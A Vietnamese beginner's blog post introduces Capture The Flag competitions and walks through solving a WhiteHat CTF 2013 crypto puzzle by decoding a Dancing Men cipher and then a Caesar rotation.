Ghi chú: Toàn bộ nội dung được ghi theo cách hiểu của mình, và mình cũng chỉ là người mới của lĩnh vực này, nếu có gì chưa phù hợp, các bạn cứ báo lại và mình sẽ chỉnh sửa ngay.
CTF là gì?
CTF là viết tắt của Capture The Flag, và bằng vốn tiếng Anh kinh dị của mình thì nó có nghĩa kiểu kiểu như là Lấy cờ, Tìm cờ (giống trò chơi hồi bé, nhắm mắt đếm 5, 10, 15, 20, 25…, cho đến 100 thì bắt đầu đi kiếm mấy đứa đang ẩn nấp khắp mọi nơi ấy). Cờ ở đây thường là một đoạn văn bản, mà có thể được kiểm tra tự động. Ví dụ:
- DayLaCo
- yeuchimse_hinh_nhu_rat_dang_yeu
- c41_n4y_cung_g01_l4_c0
Tức là, nếu quy ra cuộc sống tự nhiên, CTF tương tự như việc chúng ta được thả vào một căn phòng, và nhận yêu cầu: “Hãy tìm cho tôi một cái gì đó”. Cái gì đó ở đây (tức cờ), có thể được quy định sẵn về hình dáng của nó (như flag{abcdef}, ctf_this_is_flag chẳng hạn), hoặc không có thông tin gì kèm theo, khi đó chúng ta sẽ phải dựa theo cảm giác, rằng khi thấy một cái gì đó lạ lạ, thì nó rất có thể là cờ.
CTF có 2 dạng chính, là Jeopardy, và Attack-Defense, mình chỉ tham gia ở dạng đầu tiên. Jeopardy là hình thức chơi mà mỗi cuộc thi sẽ bao gồm các bài nhỏ, mỗi bài nhỏ lại có chứa một cờ để cho ta tìm. Khi tìm được cờ, chúng ta sẽ nhận được số điểm tương ứng. Các bài được đặt trong khá nhiều thể loại chuyên môn khác nhau, nhưng thường thì là:
- Reverse: Dịch ngược phần mềm
- Web: Bảo mật web
- Crypto: Mật mã, mã hóa
- Forensic: Điều tra số
- Stegano: Ẩn giấu thông tin
- Exploit: Khai thác lỗi
Cụ thể với WhiteHat CTF 2013, cuộc thi chia ra các mảng là Web, Crypto, Reverse, Forensic và Exploit. Mình sẽ minh họa với bài I love Sherlock Holmes, thuộc mảng Crypto.
Nội dung chính
Đề bài, chúng ta được cung cấp 1 file hình như sau:
Không có gì khác, tất cả chỉ vậy thôi, cũng không nói rằng chúng ta phải làm gì.
Đó chính là điều các bạn cần lưu ý, vì trừ trường hợp đặc biệt, còn lại thì chúng ta hiển nhiên cần hiểu rằng mọi bài sẽ có một đòi hỏi duy nhất, đó là tìm ra cờ, và submit kiếm điểm. Thay vì viết là: “Tìm x sao cho: x + 1 = 2”, chúng ta chỉ cần một cái đề: “x + 1 = 2” cũng đã coi như quá đủ!
Trở lại với công việc, nếu bạn đã từng đọc Holmes (mình thì khỏi nói, mình vô cùng cuồng Holmes và mỗi ngày hầu như đều đọc đi đọc lại mấy mẩu chuyện đã thuộc nằm lòng), thì bạn sẽ nhận ra ngay đây là phương pháp mã hóa xuất hiện trong vụ án “Những hình nhân nhảy múa”, tiếng Anh là Dancing Man. Ở vụ án này, Holmes dựa theo tần suất xuất hiện của từng chữ cái để dần dần suy ra bảng mã tham chiếu hoàn chỉnh. Chúng ta may mắn hơn Holmes, vì chúng ta có Google. Google biết mọi thứ, đó chính là niềm tin của mình
Search một lúc, ta có bảng mã cho Dancing Man như sau:
Đơn giản là đối chiếu đề bài với bảng mã tìm được, chúng ta có dãy ký tự:
RHNTKXTMTEXGMXWWXVMBOX
Nó có phải là cờ không?
Tất nhiên là bạn có quyền thắc mắc như vậy, dù rằng thông thường cờ sẽ không vô nghĩa và xấu xí đến thế
Khỏi cần thắc mắc dài dòng làm gì, submit thử thì biết chứ có gì đâu.
Wrong!
Đổi sang chữ thường và submit lại.
Wrong!
Đây có lẽ chính là điểm dừng của một số đội chơi khác, vì một lý do quá kinh khủng: không biết phải làm gì nữa
RHNTKXTMTEXGMXWWXVMBOX
Sau khi rà soát lại để chắc chắn rằng không đối chiếu nhầm ở đâu đó, chúng ta sẽ quên hết mọi thứ trong quá khứ, và coi như đề bài chỉ bắt đầu từ cái dòng ký tự xấu xí này mà thôi.
Có khá nhiều hướng khi giải quyết một bài crypto, như XOR các byte với một giá trị x nào đó, cộng thêm một giá trị y nào đó vào từng ký tự, xoay vòng các ký tự theo độ lệch z (cũng nào đó), hoặc phổ biến không kém, đó là hoán vị các ký tự (A thành S, B thành E, C thành X…), và nhiều rất nhiều thuật toán từ cơ bản đến nâng cao khác.
Hướng XOR ít khả thi, do chuỗi ta đang có rất đẹp (đẹp ở đây tức nó đều bao gồm các ký tự chữ cái), mà XOR thì không có đặc tính giữ lại độ đẹp của mật mã sau khi được giải mã (dù rằng một vài giá trị khi dùng làm khóa cũng mang lại điều này). Tuy nhiên, chúng ta vẫn sẽ giữ lại nó trong đầu như một phương án dự phòng.
Cộng thêm giá trị vào các byte, đây là một hướng tốt, có thể thử. Nhưng do mật mã có cả X và B, nên cộng thì cũng dở mà trừ thì cũng dở (vì chắc là nó vượt ra ngoài 2 biên của bảng chữ cái), xếp nó sau XOR theo độ ưu tiên vậy.
Xoay vòng các ký tự (còn gọi là Caesar): Hướng này vô cùng khả thi, do là xoay vòng, nên X + 3 = Z + 1 sẽ quay về A, nên đảm bảo rằng kết quả mã hóa cũng đẹp y như mật mã vậy. Hãy quan tâm đến nó một chút.
Hoán vị các ký tự, hướng này có thể loại ngay, do mật mã quá ngắn, không đủ cơ sở để suy luận.
Caesar
Vấn đề tiếp theo cần đối mặt, đó là nếu chọn Caesar, thì xoay với độ lệch bao nhiêu? Phổ biến thì chúng ta biết đến Rot13 (A sẽ chuyển thành N, B sẽ chuyển thành O, C sẽ chuyển thành P, và ở chiều ngược lại, N sẽ chuyển thành A, O sẽ chuyển thành B, P sẽ chuyển thành C).
Với bài này, Rot13 cho ra kết quả không đẹp:
Rot13(RHNTKXTMTEXGMXWWXVMBOX) = EUAGXKGZGRKTZKJJKIZOBK
Rot1: SIOULYUNUFYHNYXXYWNCPY Rot2: TJPVMZVOVGZIOZYYZXODQZ Rot3: UKQWNAWPWHAJPAZZAYPERA Rot4: VLRXOBXQXIBKQBAABZQFSB Rot5: WMSYPCYRYJCLRCBBCARGTC Rot6: XNTZQDZSZKDMSDCCDBSHUD Rot7: YOUAREATALENTEDDECTIVE Rot8: ZPVBSFBUBMFOUFEEFDUJWF Rot9: AQWCTGCVCNGPVGFFGEVKXG Rot10: BRXDUHDWDOHQWHGGHFWLYH Rot11: CSYEVIEXEPIRXIHHIGXMZI Rot12: DTZFWJFYFQJSYJIIJHYNAJ Rot13: EUAGXKGZGRKTZKJJKIZOBK Rot14: FVBHYLHAHSLUALKKLJAPCL Rot15: GWCIZMIBITMVBMLLMKBQDM Rot16: HXDJANJCJUNWCNMMNLCREN Rot17: IYEKBOKDKVOXDONNOMDSFO Rot18: JZFLCPLELWPYEPOOPNETGP Rot19: KAGMDQMFMXQZFQPPQOFUHQ Rot20: LBHNERNGNYRAGRQQRPGVIR Rot21: MCIOFSOHOZSBHSRRSQHWJS Rot22: NDJPGTPIPATCITSSTRIXKT Rot23: OEKQHUQJQBUDJUTTUSJYLU Rot24: PFLRIVRKRCVEKVUUVTKZMV Rot25: QGMSJWSLSDWFLWVVWULANW
Nếu tiếng Anh của bạn cũng siêu đẳng như tiếng Anh của mình, bạn sẽ thấy ngay Rot7 là cái mà ta đang tìm, kết quả thu được thực sự quá đẹp:
YOUAREATALENTEDDECTIVE
Nó đẹp đến nỗi mà nó đã có thể là cờ rồi, mình đặt niềm tin với tỉ lệ đặt 6 ăn 9
Wrong!
Wrong!
Wrong!
À hông có sao, còn chữ thường, vẫn còn chữ thường nữa mà
youareatalenteddective
Correct :)
Tổng kết
Như vậy, là mình đã vừa giới thiệu một vài điểm sơ qua về CTF, cũng như trình tự suy luận của mình đối với một bài thi cụ thể. Kiến thức là rất rộng (và sâu), nên chắc chắn rằng chúng ta sẽ luôn phải học hỏi hăng say nếu không muốn bị bỏ lại đằng sau và mau mau rớt hạng. Nếu bạn có gì đó không hiểu, hoặc bực mình vì chẳng biết XOR, Caesar nó là cái khỉ gì cả, thì hãy yên tâm, không ai sinh ra đã biết cộng trừ nhân chia đâu. Bạn còn rất nhiều cơ hội để tìm hiểu và tích lũy kinh nghiệm. Bạn có thể là người xuất phát muộn hơn, nhưng không ai có thể ngăn cản việc bạn về đích sớm hơn cả.